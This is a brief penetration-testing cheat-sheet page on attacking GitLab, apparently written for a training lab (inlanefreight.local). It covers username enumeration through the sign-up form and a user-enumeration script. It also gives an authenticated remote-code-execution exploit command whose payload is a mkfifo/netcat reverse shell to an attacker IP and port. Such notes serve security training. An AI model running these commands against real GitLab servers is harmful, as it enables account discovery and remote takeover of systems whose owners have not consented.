githubEdit

user

Gitlab username enum

GitLabUserEnum.pyarrow-up-right

Manually

  1. We may use registration form to enumerate valid users.

  2. /users/sign_up

  3. Read this post to understand more about it.

Automatic

./gitlab_userenum.sh --url http://gitlab.inlanefreight.local:8081/ --userlist users.txt

Authenticated remote code

Exploit

python3 gitlab_13_10_2_rce.py -t http://gitlab.inlanefreight.local:8081 -u mrb3n -p password1 -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash -i 2>&1|nc 10.10.14.15 8443 >/tmp/f '

Know vulnerabilities

  • gitlab_userenum.sh - affected version 13.10.3

Last updated